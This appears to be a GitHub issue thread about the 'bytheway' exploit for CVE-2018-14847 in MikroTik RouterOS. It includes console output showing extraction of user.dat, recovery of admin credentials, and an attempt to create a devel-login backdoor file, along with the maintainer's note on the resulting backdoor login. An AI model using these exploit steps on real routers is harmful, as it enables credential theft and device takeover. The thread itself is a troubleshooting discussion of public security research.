### ISSUE TITLE
Can't create devel-login - CVE-2018-14847

### ISSUE THREAD

**Issue by Manouchehri** [tenable/routeros#16]
Trying to use bytheway on 6.43rc3, but the devel login part doesn't seem to work sadly.

```
mba:build dave$ ./btw -i 192.168.88.219

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴

[+] Attempting to connect to 192.168.88.219:8291
[+] Extracting user.dat...
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.88.219:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.88.219:8291
[-] cannot create target file
```

**Comment by Manouchehri** [comment]
This feels more like a PEBKAC now that I'm reading the full DEFCON slides. Closing.

**Comment by jacob-baines** [comment]
No worries. I can't recall testing 6.43rc off the top of my head... for whatever reason I generally avoid the release candidates. But, in theory, if /pckg/option was created *and* if 6.43rc3 is like 6.42.0, you should be able to login with devel:lol - I'm happy to look into on Monday.

**Comment by Manouchehri** [comment]
The device shipped with 6.42.6, so thought it made sense to go to 6.43rc3. =)

cleaner_wrasse worked with CVE-2019-3943! =)
